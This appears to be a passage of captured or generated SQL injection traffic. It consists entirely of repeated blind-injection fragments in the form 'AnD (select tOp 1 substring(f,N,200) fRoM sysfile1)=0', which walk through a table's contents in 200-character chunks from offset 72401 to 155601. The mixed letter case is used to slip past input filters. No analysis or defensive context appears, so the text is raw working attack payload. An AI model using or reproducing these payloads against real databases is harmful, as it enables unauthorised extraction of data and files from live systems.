1 substring(f,72401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,72601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,72801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,73001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,73201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,73401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,73601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,73801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,74001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,74201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,74401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,74601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,74801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,75001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,75201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,75401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,75601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,75801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,76001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,76201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,76401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,76601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,76801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,77001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,77201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,77401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,77601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,77801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,78001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,78201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,78401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,78601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,78801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,79001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,79201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,79401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,79601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,79801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,80001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,80201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,80401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,80601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,80801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,81001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,81201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,81401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,81601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,81801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,82001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,82201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,82401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,82601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,82801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,83001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,83201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,83401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,83601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,83801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,84001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,84201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,84401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,84601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,84801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,85001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,85201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,85401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,85601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,85801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,86001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,86201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,86401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,86601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,86801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,87001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,87201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,87401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,87601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,87801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,88001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,88201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,88401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,88601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,88801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,89001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,89201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,89401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,89601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,89801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,90001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,90201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,90401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,90601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,90801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,91001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,91201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,91401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,91601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,91801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,92001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,92201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,92401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,92601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,92801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,93001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,93201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,93401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,93601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,93801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,94001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,94201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,94401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,94601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,94801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,95001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,95201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,95401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,95601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,95801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,96001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,96201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,96401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,96601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,96801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,97001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,97201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,97401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,97601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,97801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,98001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,98201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,98401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,98601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,98801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,99001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,99201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,99401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,99601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,99801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,100001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,100201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,100401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,100601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,100801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,101001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,101201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,101401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,101601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,101801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,102001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,102201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,102401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,102601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,102801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,103001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,103201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,103401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,103601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,103801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,104001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,104201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,104401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,104601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,104801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,105001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,105201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,105401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,105601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,105801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,106001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,106201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,106401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,106601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,106801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,107001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,107201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,107401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,107601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,107801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,108001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,108201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,108401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,108601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,108801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,109001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,109201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,109401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,109601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,109801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,110001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,110201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,110401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,110601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,110801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,111001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,111201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,111401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,111601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,111801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,112001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,112201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,112401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,112601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,112801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,113001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,113201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,113401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,113601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,113801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,114001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,114201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,114401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,114601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,114801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,115001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,115201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,115401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,115601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,115801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,116001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,116201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,116401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,116601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,116801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,117001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,117201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,117401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,117601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,117801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,118001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,118201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,118401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,118601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,118801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,119001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,119201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,119401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,119601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,119801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,120001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,120201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,120401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,120601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,120801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,121001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,121201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,121401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,121601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,121801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,122001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,122201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,122401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,122601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,122801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,123001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,123201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,123401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,123601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,123801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,124001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,124201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,124401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,124601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,124801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,125001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,125201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,125401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,125601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,125801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,126001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,126201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,126401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,126601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,126801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,127001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,127201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,127401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,127601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,127801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,128001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,128201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,128401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,128601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,128801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,129001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,129201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,129401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,129601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,129801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,130001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,130201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,130401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,130601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,130801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,131001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,131201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,131401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,131601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,131801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,132001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,132201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,132401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,132601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,132801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,133001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,133201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,133401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,133601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,133801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,134001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,134201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,134401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,134601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,134801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,135001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,135201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,135401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,135601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,135801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,136001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,136201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,136401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,136601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,136801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,137001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,137201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,137401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,137601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,137801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,138001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,138201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,138401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,138601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,138801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,139001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,139201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,139401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,139601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,139801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,140001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,140201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,140401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,140601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,140801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,141001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,141201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,141401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,141601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,141801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,142001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,142201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,142401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,142601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,142801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,143001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,143201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,143401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,143601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,143801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,144001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,144201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,144401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,144601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,144801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,145001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,145201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,145401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,145601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,145801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,146001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,146201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,146401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,146601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,146801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,147001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,147201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,147401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,147601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,147801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,148001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,148201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,148401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,148601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,148801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,149001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,149201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,149401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,149601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,149801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,150001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,150201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,150401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,150601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,150801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,151001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,151201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,151401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,151601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,151801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,152001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,152201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,152401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,152601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,152801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,153001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,153201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,153401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,153601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,153801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,154001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,154201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,154401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,154601,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,154801,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,155001,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,155201,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,155401,200) fRoM sysfile1)=0  1  AnD (select tOp 1 substring(f,155601,200) fRoM 